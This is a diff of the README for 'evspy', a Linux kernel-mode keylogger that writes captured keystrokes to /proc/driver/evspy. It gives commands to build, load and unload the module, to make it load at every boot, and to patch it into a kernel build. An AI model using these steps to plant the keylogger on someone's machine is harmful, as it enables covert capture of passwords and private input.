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-** INTRO **
-
Evspy is a general purpose kernel-mode keylogger in (early) development stage.
The file from where you can read the registered keystrokes is /proc/driver/evspy
@@ -9,22 +7,18 @@ Don't be evil.
** COMPILE **
-
$ make
** LOAD **
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# insmod evspy.ko
** UNLOAD **
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# rmmod evspy
** IS IT ALREADY LOADED? **
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$ lsmod | grep evspy
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If you want evspy to be loaded every time system boots, copy it into your
kernel module dir:
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# cp evspy.ko /lib/modules/$(uname -r)/kernel/drivers/input/evspy.ko
and update module database:
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# depmod -a
(In some distros it could also be necessary to add it to some rc/config file)
Once it has been installed, you can load it when you want with
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# modprobe evspy
** OTHER **
A patch is supplied (evspy.patch) to be able to compile a kernel with evspy
-included; just cd to your Linux source tree, copy all the evspy files (*.c *.h)
-to drivers/input/, and apply the patch. Then you should be able to configure the
-kernel to include evspy just like any other module:
+included; just cd to your Linux source tree, copy all the evspy files
+(*.c *.h maps khm) to drivers/input/, and apply the patch.
+Then you should be able to configure the kernel to include evspy just like
+any other module:
Device Drivers --> Input device support --> Event based keylogger